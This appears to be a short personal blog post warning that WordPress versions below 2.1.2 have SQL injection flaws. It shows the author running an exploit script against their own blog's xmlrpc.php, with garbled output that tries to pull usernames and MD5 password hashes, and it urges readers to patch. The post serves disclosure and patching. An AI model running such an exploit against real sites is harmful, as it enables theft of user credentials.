WordPress 2.1.2 SQL Injection Vulnerabilities

If you are running a WordPress version below 2.1.2, patch it immediately; those versions have SQL injection vulnerabilities. Here is my test before patching.


wp-injection.pl http://www.takizo.com/blog/xmlrpc.php xxxxx xxxxx 10

The usage is correct
[*] Trying Host http://www.takizo.com/blog/xmlrpc.php ...
[+] The xmlrpc server seems to be working
--------------------
Username for id = 1 is:--> 3
AN
Md5 hash for user: 3
AN
is: 3
AND post_id = 10 union al
--------------------
Username for id = 2 is:--> 3
AN
Md5 hash for user: 3
AN
is: 3
AND post_id = 10 union al

Of course there are more that I didn’t show la; just patch it! If you are lazy, this fellow can help you do it for free.